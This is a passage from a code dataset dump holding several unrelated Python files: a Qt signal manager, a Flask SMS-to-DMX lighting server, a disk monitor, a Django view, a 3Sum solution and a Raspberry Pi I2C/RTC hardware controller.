self.print_getSignal\n\n @property\n def emitable(self):\n return self._emittable\n\n @property\n def printEmitable(self):\n return self.print_emittable\n\n @property\n def printEmit(self):\n return self.print_emit\n\n @property\n def printBlock(self):\n return self.print_block\n\n @property\n def printCheckRepeat(self):\n return self.print_checkRepeat\n\n @signals.setter\n def signals(self, val):\n self._signals = val\n\n @printCheckState.setter\n def printCheckState(self, val):\n self.print_checkState = val\n\n @autoChangeEmittable.setter\n def autoChangeEmittable(self, val):\n self.auto_changeEmmittable = val\n\n @printGetSignal.setter\n def printGetSignal(self, val):\n self.print_getSignal = val\n\n @printEmitable.setter\n def printEmitable(self, val):\n self.print_emittable = val\n\n @printEmit.setter\n def printEmit(self, val):\n self.print_emit = val\n\n @printBlock.setter\n def printBlock(self, val):\n self.print_block = val\n\n @printCheckRepeat.setter\n def printCheckRepeat(self, val):\n self.print_checkRepeat = val\n\n @emitable.setter\n def emitable(self, val):\n self._emittable = val\n\n# -------------------------------------------------------------------------------------------------------------\n\"\"\" Signal class: setup all the signal which will be using. \"\"\"\n\nclass SignalManager(Signal):\n\n key = \"SignalManager\"\n\n showLayoutOld = DAMGLIST()\n executingOld = DAMGLIST()\n regisLayoutOld = DAMGLIST()\n openBrowserOld = DAMGLIST()\n setSettingOld = DAMGLIST()\n sysNotifyOld = DAMGLIST()\n updateAvatarOld = DAMGLIST()\n loginChangedOld = DAMGLIST()\n\n def __init__(self, parent=None):\n super(SignalManager, self).__init__(parent)\n\n self.parent = parent\n\n try:\n self.parent.children()\n except AttributeError:\n pass\n else:\n self.setParent(self.parent)\n finally:\n self.key = '{0}_{1}'.format(self.parent.key, self.key)\n\n def emit(self, signal, op1=None, op2=None, op3=None, op4=None):\n\n if self._emittable:\n sig = self.getSignal(signal)\n self.loadState()\n if signal == 'showLayout':\n self.showLayoutOld, repeat = self.checkSignalRepeat(self.showLayoutOld, [op1, op2])\n old = self.showLayoutOld\n if repeat:\n if self.print_checkState:\n print(self.key, self.states)\n if not self.states[op1] == op2:\n self.states.add(op1, op2)\n self.updateState()\n sig.emit(op1, op2)\n else:\n if self.print_checkState:\n print(self.key, self.states)\n self.states.add(op1, op2)\n self.updateState()\n sig.emit(op1, op2)\n elif signal == 'executing':\n self.executingOld, repeat = self.checkSignalRepeat(self.executingOld, [op1])\n old = self.executingOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'regisLayout':\n self.regisLayoutOld, repeat = self.checkSignalRepeat(self.regisLayoutOld, [op1])\n old = self.regisLayoutOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'openBrowser':\n self.openBrowserOld, repeat = self.checkSignalRepeat(self.openBrowserOld, [op1])\n old = self.openBrowserOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'setSetting':\n self.setSettingOld, repeat = self.checkSignalRepeat(self.setSettingOld, [op1, op2, op3])\n old = self.setSettingOld\n if not repeat:\n sig.emit(op1, op2, op3)\n elif signal == 'sysNotify':\n self.sysNotifyOld, repeat = self.checkSignalRepeat(self.sysNotifyOld, [op1, op2, op3, op4])\n old = self.sysNotifyOld\n if not repeat:\n sig.emit(op1, op2, op3, op4)\n elif signal == 'updateAvatar':\n self.updateAvatarOld, repeat = self.checkSignalRepeat(self.updateAvatarOld, [op1])\n old = self.updateAvatarOld\n if not repeat:\n sig.emit(op1)\n elif signal == 'loginChanged':\n self.loginChangedOld, repeat = self.checkSignalRepeat(self.loginChangedOld, [op1])\n old = self.loginChangedOld\n if not repeat:\n sig.emit(op1)\n else:\n repeat = False\n old = []\n\n if repeat:\n if self.print_block:\n print('{2}: block signal {0}: {1}'.format(signal, old, self.key))\n return\n else:\n if self.print_emit:\n print('{0} signal {1} emmited'.format(self.parent.key, signal))\n return\n else:\n if self.print_emittable:\n print('UnEmittableError: {0} is not allowed to emit'.format(self.key))\n return\n\n def getSignal(self, signal):\n if self.print_getSignal:\n print('{0} get signal: {1}'.format(self.parent.key, signal))\n return self.signals[signal][0]\n\n def connect(self, signal, target):\n sig = self.getSignal(signal)\n if self.auto_changeEmmittable:\n self._emittable = True\n return sig.connect(target)\n else:\n print('EmittableAllowError: Signal is not allowed to emit: {0}'.format(signal))\n\n def checkSignalRepeat(self, old, data):\n new = [i for i in data]\n\n if self.print_checkRepeat:\n print(new, old)\n\n if len(new) == 0:\n repeat = False\n elif len(new) == len(old):\n repeat = True\n for i in range(len(new)):\n if not new[i] == old[i]:\n repeat = False\n break\n else:\n repeat = False\n\n old = DAMGLIST()\n old.appendList(new)\n return old, repeat\n\n# -------------------------------------------------------------------------------------------------------------\n# Created by panda on 25/10/2019 - 6:59 AM\n# © 2017 - 2018 DAMGteam. All rights reserved","sub_path":"ui/SignalManager.py","file_name":"SignalManager.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190134130","text":"from __future__ import print_function\nfrom flask import Flask, render_template, request\nfrom uwsgidecorators import *\nfrom xkcd_colors import xkcd_names_to_hex\nimport webcolors\nimport time\nfrom random import randint\n\nimport socket\nfrom ola.ClientWrapper import ClientWrapper\nimport array\nimport sys\n\nwrapper = None\n\npublic = Flask(__name__)\npublic.config['PROPAGATE_EXCEPTIONS'] = True\n\n# Include \"no-cache\" header in all POST responses\n@public.after_request\ndef add_no_cache(response):\n if request.method == 'POST':\n response.cache_control.no_cache = True\n return response\n\n### Home page ###\n@public.route('/')\n@public.route('/index.html')\ndef default_page():\n return render_template('/index.html')\n\ndef DmxSent(status):\n if status.Succeeded():\n print('Success!')\n else:\n print('Error: %s' % status.message, file=sys.stderr)\n\n global wrapper\n if wrapper:\n wrapper.Stop()\n\n@public.route('/sms', methods=['POST'])\ndef parse_sms():\n message = str(request.form['Body']).strip().lower()\n print(\"Received text message: \" + message)\n universe = 1\n num_fixtures = 24\n data = array.array('B')\n if(message == \"secret\"):\n data.append(0)\n data.append(0)\n data.append(255)\n data.append(255)\n data.append(0)\n data.append(0)\n data = data * (num_fixtures/2)\n else:\n try:\n color = webcolors.hex_to_rgb(xkcd_names_to_hex[message])\n except:\n color = [randint(0, 255), randint(0, 255), randint(0, 255)]\n data.append(color[0])\n data.append(color[1])\n data.append(color[2])\n data = data * num_fixtures\n\n ip = \"172.16.11.50\"\n port = 5000\n message = \"listentome\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.sendto(message.encode(), (ip, port))\n\n time.sleep(0.1)\n global wrapper\n wrapper = ClientWrapper()\n client = wrapper.Client()\n client.SendDmx(universe, data, DmxSent)\n wrapper.Run()\n return ('')\n\n# @public.route('/sms', methods=['POST'])\n# def control_lights():\n# d = {'airforceblue': '11',\n# 'airsuperiorityblue': '11',\n# 'aliceblue': '16',\n# 'youcompletemelights': '92',\n# 'zebra': '93'}\n# allowed_commands = ['X040A',\n# 'X040B',\n# 'X0462']\n# import random\n# message = request.form['Body']\n# print \"Received text message: \" + str(message)\n# try:\n# program = int(d[message[0:25].lower().replace(' ', '')])\n# except KeyError:\n# print 'color {0} not found'.format(message)\n# program = random.randint(10,98)\n# command = 'X04%(number)2.2X' % {\"number\": program}\n# print 'Translated {0} to {1}'.format(message, command)\n# if (command in allowed_commands):\n# pytronics.serialWrite(command, speed=9600)\n# else:\n# print \"Command {0} is not one of the allowed commands.\".format(command)\n# command = 'FAIL'\n# return('{0}'.format(command))\n\nif __name__ == \"__main__\":\n public.run(host='127.0.0.1:5000', debug=True)\n","sub_path":"Software and Code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"646888179","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@author: yushuibo\n@licence: (c) Copyright 2017-2027, Node Supply China Manager Corporation Limited.\n@contact: hengchen2005@gmail.com\n@sftware: PyCharm\n@site : \n@file : disk_monitor.py\n@time: 2018/2/7 下午 01:39\n@desc: --\n'''\n\nfrom utils.monitor import Monitor\n\n\nclass DiskMonitor(Monitor):\n\n\tdef watch(self, server):\n\t\tfor disk in server.disks:\n\t\t\tif disk.is_less():\n\t\t\t\tmsg = 'A problem of low hard drive space.\\nDetails:\\n\\tServerName:\\t{0}\\n\\tIP:\\t{1}\\n\\tDisk:\\n\\t' \\\n\t\t\t\t 'FileSystem\\tSize\\tUsed\\tAvail\\tUsed%\\tMounted on\\n\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\t{7}'.\\\n\t\t\t\t\tformat(server.name, server.ip, disk.fileSystem, disk.size, disk.used, disk.avail, disk.use_percent,\n\t\t\t\t disk.mounted_on)\n\t\t\t\tself.send_mail('Warnning!', ''.join(msg))\n","sub_path":"lazydog/build/lazydog_v0.1/utils/disk_monitor.py","file_name":"disk_monitor.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"284223929","text":"from django.shortcuts import render\n\n## app specific\n# from .models import Tile\n# from apps.portal.models import Banner\n\n## set some variables for the scope of this applications views\nappName = 'landing'\nappTitle = 'Home'\n\n\ndef index( request ):\n template = appName+'/index.html'\n data = {\n 'appTitle': appTitle,\n 'appUrlBase': '/'+appName+'/',\n 'pageHeader': appTitle,\n }\n\n return render( request, template, data )\n","sub_path":"project/apps/landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"279850997","text":"class Solution:\n # @return an integer\n def threeSumClosest(self, num, target):\n\n num.sort()\n #print num\n length = len(num)\n minDist = None\n minSum = None\n\n for i in range(length-2):\n\n if i > 0 and num[i-1] == num[i]:\n continue\n\n\n target2 = target - num[i]\n\n sum = self.twoSumClosest(num, length, i+1, target2)\n #print target2, sum\n dist = target2 - sum\n if minDist == None or abs(dist) < abs(minDist):\n minDist = dist\n minSum = num[i] + sum\n #print 'ssss', i, num[i], sum, minSum\n\n return minSum\n\n def twoSumClosest(self, num, length, start, target):\n\n minDist = None\n minSum = None\n\n end = length - 1\n\n #print start, target\n\n while start < end:\n\n sum = num[start] + num[end]\n\n dist = sum - target\n if minDist == None or abs(dist) < abs(minDist):\n minDist = dist\n minSum = sum\n #print 'minSum', start, end, sum, target\n\n\n if sum > target:\n end -= 1\n elif sum < target:\n start += 1\n else:\n\n return sum\n\n\n return minSum\n\n\n","sub_path":"LeetCode/python/001-030/016-3sum-closest/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"117361524","text":"#!/usr/bin/python\n# encoding=utf-8\nimport smbus\nimport time\nimport sys\nimport datetime\nfrom datetime import datetime\nimport socket\nimport _thread\nimport configparser\nimport os\nimport RPi.GPIO as GPIO\n\n#Status Variable 16IN 1x pro Bus mit 8 Werten\nstatIN0 = [0,0,0,0,0,0,0,0]\nstatIN1 = [0,0,0,0,0,0,0,0]\nstatIN2 = [0,0,0,0,0,0,0,0]\n\n#Globale Variablen\nstatusI2C = 1\nclSocket = \"\"\nclIP = \"\"\naIN0 = []\naIN1 = []\naIN2 = []\naOut0= []\naOut1= []\naOut2= []\naPWM0= []\naPWM1= []\naPWM2= []\naRGBW0= []\naRGBW1= []\naRGBW2= []\naANA0= []\naANA1= []\naANA2= []\n\n#MUX:\nclass multiplex:\n \n def __init__(self, bus):\n self.bus = smbus.SMBus(bus)\n\n def channel(self, address=0x71,channel=0): # values 0-3 indictae the channel, anything else (eg -1) turns off all channels\n \n if (channel==0): action = 0x04\n elif (channel==1): action = 0x05\n elif (channel==2): action = 0x06\n elif (channel==3): action = 0x07\n else : action = 0x00\n self.bus.write_byte_data(address,0x04,action) #0x04 is the register for switching channels \n\n\n#RTC:\ndef _bcd_to_int(x):\n # Decode 2x4 bit BCD to byte value\n return int((x//16)*10 + x%16)\n\ndef _int_to_bcd(x):\n # Encode byte value to BCD\n return int((x//10)*16 + x%10)\n\n#http://www.netzmafia.de/skripten/hardware/RasPi/Projekt-RTC/DS1307_lib.py\nclass DS1307():\n DS_REG_SECONDS = 0x00\n DS_REG_MINUTES = 0x01\n DS_REG_HOURS = 0x02\n DS_REG_DOW = 0x03\n DS_REG_DAY = 0x04\n DS_REG_MONTH = 0x05\n DS_REG_YEAR = 0x06\n DS_REG_CONTROL = 0x07\n DS_REG_TEMP_HSB = 0x11\n DS_REG_TEMP_LSB = 0x12\n \n\n def __init__(self, twi=1, addr=0x68):\n self._bus = smbus.SMBus(twi)\n self._addr = addr\n\n def _read_seconds(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_SECONDS))\n \n def _read_minutes(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_MINUTES))\n\n def _read_hours(self):\n d = self._bus.read_byte_data(self._addr, self.DS_REG_HOURS)\n if (d == 0x64): # 12-Std.-Modus\n if ((d & 0b00100000) > 0):\n # Umrechnen auf 24-Std.-Modus\n return _bcd_to_int(d & 0x3F) + 12\n return _bcd_to_int(d & 0x3F)\n\n def _read_dow(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_DOW))\n\n def _read_day(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_DAY))\n\n def _read_month(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_MONTH)&0b01111111)\n\n def _read_year(self):\n return _bcd_to_int(self._bus.read_byte_data(self._addr, self.DS_REG_YEAR))\n\n def read_temp(self):\n byte_tmsb = self._bus.read_byte_data(self._addr,self.DS_REG_TEMP_HSB)\n byte_tlsb = bin(self._bus.read_byte_data(self._addr,self.DS_REG_TEMP_LSB))[2:].zfill(8)\n return byte_tmsb+int(byte_tlsb[0])*2**(-1)+int(byte_tlsb[1])*2**(-2)\n\n def read_all(self):\n # Gibt eine Liste zurueck: (year, month, day, dow, hours, minutes, seconds).\n return (self._read_year(), self._read_month(), self._read_day(),\n self._read_dow(), self._read_hours(), self._read_minutes(),\n self._read_seconds())\n\n def read_str(self, century=20):\n # Gibt einen Datum/Zeit-String im Format 'YYYY-DD-MM HH:MM:SS' zurueck.\n return '%04d-%02d-%02d %02d:%02d:%02d' % (century*100 + self._read_year(),\n self._read_month(), self._read_day(), self._read_hours(),\n self._read_minutes(), self._read_seconds())\n\n def read_datetime(self, century=20, tzinfo=None):\n # Gibt ein datetime.datetime Objekt zurueck.\n return datetime(century*100 + self._read_year(),\n self._read_month(), self._read_day(), self._read_hours(),\n self._read_minutes(), self._read_seconds(), 0, tzinfo=tzinfo)\n\n def set_clock(self, century=20):\n # Liest einen Datum/Zeit-String im Format 'MMDDhhmmYYss' aus der RTC \n # und setzt das Systemdatum mittels date-Kommando.\n cmd = 'sudo date %02d%02d%02d%02d%04d.%02d' % (self._read_month(),\n self._read_day(), self._read_hours(), self._read_minutes(),\n century*100 + self._read_year(), self._read_seconds())\n os.system(cmd)\n\n\n def write_all(self, seconds=None, minutes=None, hours=None, dow=None,\n day=None, month=None, year=None):\n # Setzt Datum und Uhrzeit der RTC, jedoch nur die nicht-None-Werte.\n # Prueft auf Einhaltung der zulaessigen Wertegrenzen:\n # seconds [0-59], minutes [0-59], hours [0-23],\n # dow [1-7], day [1-31], month [1-12], year [0-99].\n if seconds is not None:\n if seconds < 0 or seconds > 59:\n raise ValueError('Seconds out of range [0-59].')\n self._bus.write_byte_data(self._addr, self.DS_REG_SECONDS, _int_to_bcd(seconds))\n\n if minutes is not None:\n if minutes < 0 or minutes > 59:\n raise ValueError('Minutes out of range [0-59].')\n self._bus.write_byte_data(self._addr, self.DS_REG_MINUTES, _int_to_bcd(minutes))\n\n if hours is not None:\n if hours < 0 or hours > 23:\n raise ValueError('Hours out of range [0-23].')\n self._bus.write_byte_data(self._addr, self.DS_REG_HOURS, _int_to_bcd(hours))\n\n if year is not None:\n if year < 0 or year > 99:\n raise ValueError('Year out of range [0-99].')\n self._bus.write_byte_data(self._addr, self.DS_REG_YEAR, _int_to_bcd(year))\n\n if month is not None:\n if month < 1 or month > 12:\n raise ValueError('Month out of range [1-12].')\n self._bus.write_byte_data(self._addr, self.DS_REG_MONTH, _int_to_bcd(month))\n\n if day is not None:\n if day < 1 or day > 31:\n raise ValueError('Day out of range [1-31].')\n self._bus.write_byte_data(self._addr, self.DS_REG_DAY, _int_to_bcd(day))\n\n if dow is not None:\n if dow < 1 or dow > 7:\n raise ValueError('DOW out of range [1-7].')\n self._bus.write_byte_data(self._addr, self.DS_REG_DOW, _int_to_bcd(dow))\n\n def write_datetime(self, dto):\n # Setzt Datum/Zeit der RTC aus dem Inhalt eines datetime.datetime-Objekts.\n # isoweekday() liefert: Montag = 1, Dienstag = 2, ..., Sonntag = 7;\n # RTC braucht: Sonntag = 1, Montag = 2, ..., Samstag = 7\n wd = dto.isoweekday() + 1 # 1..7 -> 2..8\n if wd == 8: # Sonntag\n wd = 1\n self.write_all(dto.second, dto.minute, dto.hour, wd,\n dto.day, dto.month, dto.year % 100)\n\n def write_now(self):\n # Aequivalent zu write_datetime(datetime.datetime.now()).\n self.write_datetime(datetime.now())\n\n\n#Konfiguration schreiben, wenn nicht vorhanden, anlegen, sonst gewünschte Daten hinzufügen/Anpassen\ndef configSchreiben(bereich,wert1, wert2):\n config = configparser.ConfigParser()\n config.read('Config.cfg')\n if config.has_section('Allgemein') != True:\n config['Allgemein'] = {'IP':'127.0.0.1','Port':'8000',\n 'StartZeit':str(datetime.now())}\n \n if bereich=='Allgemein': \n if config.has_option('Allgemein','StartZeit'):\n config.set('Allgemein','StartZeit',str(datetime.now()))\n else: \n config['Allgemein'] = {'StartZeit':str(datetime.now())}\n else:\n if config.has_section(bereich):\n if config.has_option(bereich,wert1):\n config.set(bereich,wert1,wert2)\n else:\n config[bereich][wert1] = wert2\n else:\n config.add_section(bereich)\n if config.has_option(bereich,wert1):\n config.set(bereich,wert1,wert2)\n else:\n config[bereich][wert1] = wert2 \n with open('Config.cfg','w') as configfile:\n config.write(configfile)\n configfile.close\n\ndef _check_i2c():\n global statusI2C\n iCnt=0\n while True:\n if statusI2C==1:\n return True\n else:\n iCnt+=1\n if iCnt >= 50:\n log(\"I2C Status: {0}\".format(str(statusI2C)),\"ERROR\")\n if iCnt>= 2000:\n return False\n time.sleep(0.001)\n return False\n\ndef set_output_konfig(kanal,adresse):\n global statusI2C\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig\",\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n #Konfiguration als Ausgangsmodul:\n try: \n plexer.channel(mux,kanal) \n plexer.bus.write_byte_data(adresse,bankAKonfig,outputKonfig)\n plexer.bus.write_byte_data(adresse,bankBKonfig,outputKonfig) \n log(\"Adresse: \" +str(hex(adresse)) + \" - Port A + B als Output gesetzt\")\n except:\n statusI2C=1\n log(\"Fehler beim Output konfigurieren\",\"ERROR\")\n statusI2C=1\n\ndef set_pwm_konfig(kanal, adresse):\n global statusI2C\n if adresse <0x50 or adresse > 0x5f:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n try:\n plexer.channel(mux,kanal)\n log(\"Adresse: {0} - PWM Konfig gesetzt\".format(hex(adresse)))\n \n #Mode1 = sleep Register 0 Wert = 16\n plexer.bus.write_byte_data(adresse,0x00,0x10)\n #prescale: round((25.000.000/(4096*Freuqnz))-1) Frequenz aus Konfig lesen!\n prescale=round((25000000/(4096*freqStd))-1)\n plexer.bus.write_byte_data(adresse,0xFE,prescale)\n #mode1 = sleep Register 0 Wert=32\n plexer.bus.write_byte_data(adresse,0x00,0x20)\n #mode2 = Ausgang Register 1 Wert = 4\n plexer.bus.write_byte_data(adresse,0x01,0x04) \n statusI2C=1\n except:\n statusI2C=1\n log(\"Fehler beim PWM konfigurieren\",\"ERROR\")\n \ndef set_input_konfig(kanal,adresse):\n global statusI2C\n if adresse <0x20 or adresse > 0x23:\n log(\"Modul adresse ungueltig\",\"ERROR\")\n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n return\n if _check_i2c() == False:\n return\n statusI2C=0\n #Konfiguration als Ausgangsmodul:\n try:\n plexer.channel(mux,kanal)\n plexer.bus.write_byte_data(adresse,bankAKonfig,inputKonfig)\n plexer.bus.write_byte_data(adresse,bankBKonfig,inputKonfig)\n plexer.bus.write_byte_data(adresse,IOCONA,0x44)\n plexer.bus.write_byte_data(adresse,IOCONB,0x44)\n plexer.bus.write_byte_data(adresse,DEFVALA,0x00)\n plexer.bus.write_byte_data(adresse,DEFVALB,0x00)\n plexer.bus.write_byte_data(adresse,INTCONA,0x00)\n plexer.bus.write_byte_data(adresse,INTCONB,0x00)\n plexer.bus.write_byte_data(adresse,GPPUA,0x00)\n plexer.bus.write_byte_data(adresse,GPPUB,0x00)\n plexer.bus.write_byte_data(adresse,IPOLA,0x00)\n plexer.bus.write_byte_data(adresse,IPOLB,0x00)\n plexer.bus.write_byte_data(adresse,GPINTENA,0xFF)\n plexer.bus.write_byte_data(adresse,GPINTENB,0xFF)\n log(\"Adresse:{0} - Port A + B als Input gesetzt\".format(hex(adresse)),\"INFO\")\n statusI2C=1\n except:\n log(\"Fehler beim Input konfigurieren\",\"ERROR\")\n statusI2C=1\n finally:\n statusI2C=1\n\ndef sendUDP(data):\n #Daten Senden\n global clSocket\n global clIP\n try:\n res=clSocket.send(data.encode())\n except IOError as err:\n log(\"UDP-Fehler:{0} ; {1}\".format(str(err),data),\"ERROR\")\n #Daten pruefen:\n if (int(res)==int(data.encode().__len__())):\n log(\"UDP-Gesendet: {0} : {1}\".format(clIP,data))\n else:\n log(\"UDP-Fehler. Gesendet: {0} Empfangen: {1}\".format(data.__len__(),res),\"ERROR\")\n log(\"UDP-Fehlerdaten: {0}\".format(data),\"ERROR\")\n\ndef getUDP():\n global statusI2C\n global clSocket\n global clIP\n conClosed=False\n (clSocket, clIP) = tcpSocket.accept()\n log(\"Verbunden: {0}\".format(clIP))\n while True:\n #log(\"Get UDP\")\n GeCoSInData=\"\"\n data=\"\"\n arr=\"\"\n while data[-1:]!=\"}\":\n try:\n #Testen ob noch verbunden? \n blk=clSocket.recv(1).decode(\"utf-8\")\n if len(blk)==0:\n conClosed=True\n break \n except:\n log(\"Fehler beim Empfangen\",\"ERROR\")\n data+=blk\n log(\"Empfangen: {0} : {1}\".format(clIP,data))\n GeCoSInData=data[:-1]\n data = \"\"\n if len(GeCoSInData)>0:\n if GeCoSInData[0]==\"{\":\n GeCoSInData=GeCoSInData.replace(\"{\",\"\")\n #GeCoSInData=GeCoSInData.replace(\"}\",\"\")\n #print(GeCoSInData)\n if GeCoSInData==\"MOD\":\n modulSuche()\n elif GeCoSInData==\"SAI\":\n interrutpKanal(intKanal0)\n interrutpKanal(intKanal1)\n interrutpKanal(intKanal2)\n elif GeCoSInData==\"SPWM\":\n pwmAll()\n elif GeCoSInData==\"SRGBW\":\n rgbwAll()\n elif GeCoSInData==\"SAO\":\n ReadOutAll()\n elif GeCoSInData==\"RRTC\":\n read_rtc()\n #RTC lesen\n elif len(GeCoSInData)>=7: #13\n arr=GeCoSInData.split(\";\")\n if arr[0]==\"SOM\":\n set_output(arr)\n elif arr[0]==\"PWM\":\n set_pwm(arr)\n elif arr[0]==\"RGBW\":\n set_rgbw(arr)\n elif arr[0]==\"SAM\":\n read_analog(arr)\n elif arr[0]==\"SRTC\":\n #RTC Setzen\n set_rtc(arr)\n else:\n GeCoSInData.replace(\"{\",\"\")\n GeCoSInData.replace(\"}\",\"\")\n sendUDP(\"{0}ERR;{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n else:\n GeCoSInData.replace(\"{\",\"\")\n GeCoSInData.replace(\"}\",\"\")\n sendUDP(\"{0}ERR;{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n else:\n arr=\"\"\n statusI2C==1\n #Verbindung unterbrochen, Neue Verbindung akzeptieren:\n if conClosed==True:\n log(\"Verbindung getrennt!\",\"ERROR\")\n thread_gecosOut()\n break\n else:\n sendUDP(\"{0}{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n\ndef thread_gecosOut():\n _thread.start_new_thread(getUDP,())\n\ndef thread_interrupt(pin):\n _thread.start_new_thread(interrutpKanal,(pin,))\n\ndef read_output(kanal,adresse):\n global statusI2C\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig: {0}\".format(adresse))\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\")\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n try:\n if _check_i2c() == False:\n return \n \n statusI2C=0\n #Bytes fuer Bank A + B auslesen\n plexer.channel(mux,kanal) \n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n iOut = [iOutB, iOutA]\n i=int.from_bytes(iOut,\"big\")\n sArr+=\"{0};\".format(i)\n sStatus=\"OK\" \n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Output lesen\"\n log(\"Fehler Output lesen: {0}\".format(sArr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\"{0}}}\".format(sStatus)\n sendUDP(sArr)\n\ndef set_output(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig: {0}\".format(adresse))\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n try:\n if _check_i2c() == False:\n return \n statusI2C=0\n #Bytes fuer Bank A + B auslesen\n plexer.channel(mux,kanal) \n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n tmpArrOut=int(arr[3]).to_bytes(2,\"big\")\n iOutA=tmpArrOut[1]\n iOutB=tmpArrOut[0]\n plexer.channel(mux,kanal)\n plexer.bus.write_byte_data(adresse,bankA,iOutA)\n plexer.bus.write_byte_data(adresse,bankB,iOutB)\n #Prüfen und antworten.\n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n sStatus=\"OK\" \n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Output lesen\"\n log(\"Fehler Output: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr) \n \ndef log(message, level=\"INFO\"):\n timestamp= time.strftime(\"%d.%m.%Y %H:%M:%S\", time.localtime(time.time()))\n print(\"{0} {1}: {2}\".format(timestamp, level, message))\n if level==\"ERROR\":\n file = open(\"/home/pi/logfile.log\",\"a\")\n file.write(\"%s: %s\\n\" % (time.strftime(\"%d.%m.%Y %H:%M:%S\"), message))\n file.close\n\n \ndef set_bit(v, index, x): #v=original wert, x= true oder false\n #Bit auf 1/0 setzen (True oder False)\n mask = 1<< index\n v&=~mask\n if x:\n v |= mask\n return v\n \ndef ReadOutAll():\n global statusI2C\n global aOut0\n for kanal in range(3):\n if kanal==0:\n for device in aOut0:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==1:\n for device in aOut1:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aOut2:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n \n\ndef pwmAll():\n global statusI2C,aPWM0,aPWM1,aPWM2\n for kanal in range(3):\n if kanal==0:\n for device in aPWM0:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==1:\n for device in aPWM1:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aPWM2:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n\n\ndef rgbwAll():\n global statusI2C,aRGBW0,aRGBW1,aRGBW2\n for kanal in range(3):\n if kanal==0:\n for device in aRGBW0:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass\n if 